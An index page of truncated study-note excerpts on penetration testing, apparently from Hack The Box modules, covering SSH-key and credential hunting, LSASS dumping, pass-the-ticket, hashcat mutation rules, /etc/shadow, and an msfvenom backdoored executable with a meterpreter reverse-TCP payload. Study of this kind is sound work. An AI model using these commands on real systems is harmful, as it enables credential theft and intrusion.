1. Protected Files 1) Hunting for Encoded Files (1) Hunting for SSH Keyscry0l1t3@unixclient:~$ grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"/home/cry0l1t3/.ssh/internal_db:1:-----BEGIN OPENSSH PRIVATE KEY-----/home/cry0l1t3/.ssh/SSH.private:1:-----BEGIN OPENSSH PRIVATE KEY-----/home/cry0l1t3/Mgmt/ceil.key:1:-----BEGIN OPENSSH PRIVATE KEY------ Most SSH keys we will find nowadays are encrypt..
Study Record/Cybersecurity
1. PtT (Pass the Ticket) from Windows- In this attack, we use a stolen Kerberos ticket to move laterally instead of an NTLM password hash. 1) Kerberos Protocol Refresher- The Kerberos authentication system is ticket-based.- Kerberos keeps all tickets on your local system and presents each service only the specific ticket for that service, preventing a ticket from being used for another purpose. ..
1. Credential Hunting in Windows- It is the process of performing detailed searches across the file system and through various applications to discover credentials. 1) Search Centric(1) Key Terms to Searcha. Passwordsb. Passphrasesc. Keysd. Usernamee. User accountf. Credsg. Usersh. Passkeysi. Passphrasesj. configurationk. dbcredentiall. dbpasswordm. pwdn. Logino. Credentials (2) Running Lazagne ..
1. Attacking LSASS 1) LSASS- Stores credentials that have active logon sessions on Windows systems- Cache credentials locally in memory- Create access tokens- Enforce security policies- Write to Windows security log 2) Dumping LSASS Process Memory (1) Task Manager Method- With access to an interactive graphical session with the target, we can use task manager to create a memory dump. a. Open Tas..
1. Password Reuse / Default Passwords1) Credential Stuffing- Attacking services with the default or obtained credentials- This is a simplified variant of brute-forcing because only composite usernames and the associated passwords are used.https://github.com/ihebski/DefaultCreds-cheat-sheet GitHub - ihebski/DefaultCreds-cheat-sheet: One place for all the default credentials to assist the Blue/Red..
1. Password Mutations1) Password Listyeon0815@htb[/htb]$ cat password.listpassword 2) Hashcat(1) : - Do nothing(2) l - Lowercase all letters(3) u - Uppercase all letters(4) c - Capitalize the first letter and lowercase others.(5) sXY - Replace all instances of X with Y.(6) $! - Add the exclamation character at the end. 3) Hashcat Rule Fileyeon0815@htb[/htb]$ cat custom.rule:cso0c so0sa@c sa@c sa..
1. Network Services1) WinRM (Windows Remote Management)- It is the Microsoft implementation of the network protocol WS-Management.- It is a network protocol based on XML web services using the SOAP used for remote management of Window systems.- It must be activated and configured manually in Windows 10.- TCP ports 5985 (HTTP) and 5986 (HTTPS) (1) CrackMapExec- A handy tool that we can use for ou..
1. Credential Storage1) Linux(1) /etc/shadow- Passwords are commonly stored in the form of hashes.- This file can only be read by the user root.root@htb:~# cat /etc/shadow...SNIP...htb-student:$y$j9T$3QSBB6CbHEu...SNIP...f8Ms:18955:0:99999:7:::- $ {id} $ {salt} $ {hashes}- {id} is the cryptographic hash method used to encrypt the password.a. $1$: MD5b. $2a$: Blowfishc. $5$: SHA-256d. $6$: SHA-51..
1. Evasion Techniques- We are in luck because msfvenom offers the option of using executable templates.- This allows us to use some pre-set templates for executable files, inject out payload into them, and use any executable as a platform from which we can launch our attack.- This generates what is called a backdoored executable.yeon0815@htb[/htb]$ msfvenom windows/x86/meterpreter_reverse_tcp LH..
1. Meterpreter- Meterpreter resides entirely in the memory of the remote host and leaves no traces on the hard drive, making it difficult to detect with conventional forensic techniques.- With the now updated msfconsole-v6, all Meterpreter payload communications between the target host and us are encrypted using AES to ensure confidentiality and integrity of data communications. 1) Scanning Targ..
1. Jobs- We would use the jobs command to look at the currently active tasks running in the background and terminate the old ones to free up the port.msf6 exploit(multi/handler) > jobs -hUsage: jobs [options]Active job manipulation and interaction.OPTIONS: -K Terminate all running jobs. -P Persist all running jobs on restart. -S Row search filter. -h Help banne..
1. Pluginsyeon0815@htb[/htb]$ ls /usr/share/metasploit-framework/pluginsaggregator.rb beholder.rb event_tester.rb komand.rb msfd.rb nexpose.rb request.rb session_notifier.rb sounds.rb token_adduser.rb wmap.rbalias.rb db_credcollect.rb ffautoregen.rb lab.rb msgrpc.rb openvas.rb rssfeed.rb session_tagger.rb sqlmap.rb token_hunter.rbauto_add_rou..
